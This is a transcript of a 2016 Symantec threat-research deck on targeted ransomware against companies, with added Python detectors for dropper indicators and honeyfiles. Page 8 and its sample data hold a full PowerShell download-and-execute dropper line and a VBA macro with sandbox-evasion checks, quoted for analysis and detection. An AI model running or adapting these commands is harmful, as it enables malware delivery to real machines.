Corporations - the new victims of targeted ransomware


Transcript of Corporations - the new victims of targeted ransomware

Page 1: Corporations - the new victims of targeted ransomware

Copyright 2016, Symantec Corporation

Candid Wüest, Symantec Security Response

Corporations – the new victims of targeted ransomware

Page 2: Corporations - the new victims of targeted ransomware


Ransomware is popular… because it is profitable

Page 3: Corporations - the new victims of targeted ransomware


Image: © Forbes

Page 4: Corporations - the new victims of targeted ransomware


WHY?

What if there were no hypothetical questions?

Page 5: Corporations - the new victims of targeted ransomware


Because it is profitable!

$209 million in damage, January to March 2016 (according to the FBI)

A clear conscience is usually the sign of a bad memory.

Page 6: Corporations - the new victims of targeted ransomware


The common infection vector

• Email

– Link to malicious file on Dropbox & Co.

– Office document with malicious macro

– Script file (JavaScript, VBS, PowerShell, …)

• Sometimes in a password-protected container (Zip, RAR, HTA, WSF, LNK, …)

• Infected websites

– Web exploit toolkits (1.4 million attacks blocked per day)

• Rig, Magnitude etc.

– Malvertisement

• Written in any coding language out there

– Incl. Python, PowerShell, JS, Google's Go language, …

Hard work never killed anyone, but why take the chance?

Page 7: Corporations - the new victims of targeted ransomware


Enabling Macros with Social Engineering

I don't suffer from insanity; I enjoy every minute of it.

Page 8: Corporations - the new victims of targeted ransomware


Infection dropper trends

• Use of scripting languages to evade detection/sandboxes

– Obfuscated: JavaScript, PHP, PowerShell, Python, VBS, …

– JS conditional compilation trick /*@cc_on @*/

– Macro checks for a VM (environment checks)

• "InkPicture_Painted" instead of the Document_Open() or AutoOpen() trigger

• Application.RecentFiles.Count < 3 (a freshly built sandbox has almost no recent files)

– Script checks the IP before payload download (e.g. MaxMind service)

• Payload execution

– Execute DLL with rundll32.exe and an export string

– Seed parameter from JS (to decrypt payload)

– Encrypted archive or installer package

Example dropper command line (URL redacted on the slide):

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f)

2 + 2 = 5 for extremely large values of 2!
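The indicators on this slide (ExecutionPolicy Bypass, hidden window, WebClient download to a temp file, the InkPicture_Painted trigger and the RecentFiles.Count sandbox check) can be turned into a simple scoring rule. This is an added example, not Symantec's code or a product rule; the sample command line and macro are constructed, the URL is a placeholder, and the weights and threshold are assumptions.

```python
import re

# Constructed samples (not from a real incident). The PowerShell line mirrors the
# dropper on the slide with the download URL replaced by a placeholder.
SAMPLE_POWERSHELL = (
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command "
    "$f=[System.IO.Path]::GetTempFileName();"
    "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/plugins/office365', $f); "
    "(New-Object -com WScript.Shell).Exec($f)"
)
SAMPLE_VBA = """
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As Variant)
    If Application.RecentFiles.Count < 3 Then Exit Sub
    Shell "cmd /c start stage2.exe", vbHide
End Sub
"""
BENIGN_POWERSHELL = "powershell.exe -NoProfile -File C:\\scripts\\rotate-logs.ps1"

# (name, regex, weight): weights are a judgement call for this example, not a standard.
INDICATORS = [
    ("exec_policy_bypass", r"-ExecutionPolicy\s+Bypass", 2),
    ("hidden_window", r"-WindowStyle\s*Hidden", 2),
    ("web_download", r"\.DownloadFile\(|DownloadString\(", 3),
    ("temp_payload", r"GetTempFileName\(\)", 1),
    ("wscript_exec", r"WScript\.Shell\)\.Exec\(", 2),
    ("nonstandard_macro_trigger", r"_Painted\s*\(", 3),   # event fires on render, not open
    ("recentfiles_sandbox_check", r"RecentFiles\.Count\s*<", 3),
    ("shell_from_macro", r'\bShell\s+"', 2),
]


def score_artifact(text):
    """Return (score, matched indicator names) for a command line or macro source."""
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def verdict(text, threshold=5):
    """Classify an artifact; a single indicator alone stays below the threshold."""
    score, hits = score_artifact(text)
    return ("suspicious" if score >= threshold else "benign"), score, hits
```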

Page 9: Corporations - the new victims of targeted ransomware


PowerShell ransomware

I used to be indecisive. Now I'm not sure.

Page 10: Corporations - the new victims of targeted ransomware


Ransomware (cryptolocker) expansion

100 new families identified in 2015 (77 in 2014, 88 in 2016*)

CAPS LOCK – Preventing Login Since 1980.

Page 11: Corporations - the new victims of targeted ransomware


Ransomware-as-a-service

I'd like to help you out, which way did you come in?

Page 12: Corporations - the new victims of targeted ransomware


Top 10 infections on 29.10.2016

… error joke not found

Page 13: Corporations - the new victims of targeted ransomware


Show me the money

Chart: average ransom demand per year – $372.53, $294.14, $679.65 (2014, 2015, 2016)

• Ransom is usually requested in Bitcoins

• The average ransom has more than doubled in the last year

Artificial intelligence is no match for natural stupidity.

Page 14: Corporations - the new victims of targeted ransomware


How to make even more money?

• Payment features

– TeslaCrypt chat support and free sample decryption

– CryptXXX steals Bitcoin wallet data

– Cerber adds machines to a botnet to carry out DDoS attacks

– Use of Amazon/iTunes/phone gift cards instead of Bitcoins

• New threats added to the ransom note

– Chimera threatens to post personal data online

– Jigsaw deletes random files over time

– Stampado re-encrypts files already encrypted by other cryptolockers

– Virlock spreads to shares and cloud storage as a file infector

I didn't say it was your fault, I said I was blaming you.

Page 15: Corporations - the new victims of targeted ransomware


Where are the victims?

Map of victims by country: United States 31%, Japan 8%, Germany 4%, Canada 3%, India 3%, Australia 2%; United Kingdom, Belgium, Netherlands and Italy are also marked (8%, 5%, 4% and 3%, assignment not recoverable from the slide).

Is "NO" the correct answer to this question?

Currently a big wave in Brazil

Page 16: Corporations - the new victims of targeted ransomware


Businesses as a target

43% of ransomware infections occur inside organizations

Employees like to open private emails at work

Smith & Wesson: The original point and click interface.

Page 17: Corporations - the new victims of targeted ransomware


Advanced attack techniques

Recent ransomware attacks use tactics and techniques typically seen in "APT"-style attacks

Infiltration: Exploit server-side vulnerabilities to gain access to the network.

Reconnaissance: Attackers gather information that may help in later stages of the attack, such as the back-up policy. Information gathered may also be used in the ransom note.

Lateral movement: Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems.

Stealth: Once the attack has been successfully carried out, the attackers attempt to hide their tracks by removing any tools used.

What happens if you get scared half to death, twice?

Page 18: Corporations - the new victims of targeted ransomware


Example: SamSam case

• Entry point was an unpatched web server; exploited a JBoss vulnerability with JexBoss

• Used PsExec and retrieved passwords to traverse the network

• Deleted backups to make recovery difficult

• Deployed the SamSam strain of ransomware

• Removed copies of the malware and associated tools to hide tracks

• Ransom was 1.5 Bitcoin (~US$989) for each computer

Everyone is entitled to his own opinion, but not to his own facts.

Page 19: Corporations - the new victims of targeted ransomware


Further TTPs seen

• Attack remote access tools

– Brute-forcing passwords for RDP, TeamViewer, VNC, FTP, …

• Exploit a web server and jump further from there

– SQL injection to modify DB content

• Spear phishing

• Some groups try POS or BEC scams first, and then move to ransomware

• Some «APT» groups use ransomware instead of a wiper to hide their intention

Not very sophisticated, but often successful

I can explain it to you, but I cannot understand it for you

Page 20: Corporations - the new victims of targeted ransomware


What are they after?

• Documents

• Databases (encrypt data or change the password)

• File shares/cloud (even if not mapped: passwords from mimikatz or enumeration tools)

• Websites

– E.g. added «mcrypt_encrypt()» to DB calls

• The backups (to delete them, infect them or encrypt them)

• In some rare cases industrial controllers; more likely classical blackmailing

If I agreed with you we'd both be wrong

Page 21: Corporations - the new victims of targeted ransomware


Victim organization profile

• Services: 37.8%

• Manufacturing: 17.2%

• Public Administration: 10.2%

• Finance, Insurance, & Real Estate: 9.8%

• Wholesale: 8.9%

• Transportation, Comms, & Utilities: 6.6%

• Retail: 4.3%

• Construction: 3.9%

• Mining: 1.0%

• Agri, Forestry, & Fishing: 0.5%

What about Healthcare?

Healthcare is seeing more targeted attacks and is therefore not reflected in the numbers

All generalizations are false.

Page 22: Corporations - the new victims of targeted ransomware


Crypto is difficult (for most people)

Press SPACEBAR once to quit or twice to save changes..

Page 23: Corporations - the new victims of targeted ransomware


Protection strategies

• Back up your data (out of reach of the attacker!)

• Keep your system and software up to date

• Double-check shared folders

– Do they auto-sync to the cloud?

– How is your file server protected?

• Follow best practices (2FA, security software, …)

– Disable scripts, PowerShell etc. if you don't use them

• Be prepared - run through the exercise drill

• Some have experimented with «honeyfiles» and «folder sinkholes»

Always remember you're unique, just like everyone else.
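The «honeyfiles» idea from this slide, as an added example that is not part of the original deck: decoy files are planted so that they sort first and last in a directory, a hash manifest is recorded, and a later check flags any decoy that was overwritten, deleted or renamed, which is what a cryptolocker does to everything it touches. The file names, the manifest format and the simulated encryption are assumptions of the example.

```python
import hashlib
import os
import tempfile

# Constructed decoy names: "0000_" sorts first and "zzzz_" sorts last, so a
# ransomware walking the directory hits a decoy early and late in its run.
HONEYFILE_NAMES = ["0000_invoices_2016.xlsx", "zzzz_passwords_backup.docx"]


def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def plant_honeyfiles(folder):
    """Write the decoys and return a manifest {path: sha256} to check against later."""
    manifest = {}
    for name in HONEYFILE_NAMES:
        path = os.path.join(folder, name)
        with open(path, "wb") as fh:
            fh.write(b"DECOY - do not edit. " + name.encode())
        manifest[path] = sha256_of(path)
    return manifest


def check_honeyfiles(manifest):
    """Return (path, event) for every decoy that was removed, renamed or modified."""
    alerts = []
    for path, digest in manifest.items():
        if not os.path.exists(path):
            alerts.append((path, "missing"))      # deleted, or renamed with a ransom suffix
        elif sha256_of(path) != digest:
            alerts.append((path, "modified"))     # content replaced by ciphertext
    return alerts


def demo():
    """Plant decoys, simulate a cryptolocker touching both, and return the alerts."""
    folder = tempfile.mkdtemp()
    manifest = plant_honeyfiles(folder)
    assert check_honeyfiles(manifest) == []      # clean baseline
    first, second = sorted(manifest)
    with open(first, "wb") as fh:
        fh.write(os.urandom(64))                 # "encrypted" in place
    os.rename(second, second + ".locked")        # renamed with an extension
    return check_honeyfiles(manifest)
```

In production the check would run from a scheduled task or a file-system watcher and raise an alert (and ideally isolate the host) on the first hit.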

Page 24: Corporations - the new victims of targeted ransomware


Don't forget your phones

• Android ransomware is out there

• IoT device ransomware not seen at large in the wild, but possible

Page 25: Corporations - the new victims of targeted ransomware


Summary – keep your data safe!

• 100 new families identified in 2015, most not sophisticated

• Scripts are popular to evade first-step detection

• Employees in organizations represent 43% of infections

• There are ransomware groups going after organizations

• Most attacks are not targeted, but still devastating

• It is profitable for the attackers, so it won't go away overnight

Better to understand a little than to misunderstand a lot.

Page 26: Corporations - the new victims of targeted ransomware

Thank you!

Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.

Candid Wüest, Threat Researcher, Symantec Security Response

Page 27: Corporations - the new victims of targeted ransomware


I like birthdays, but I think too many can kill you.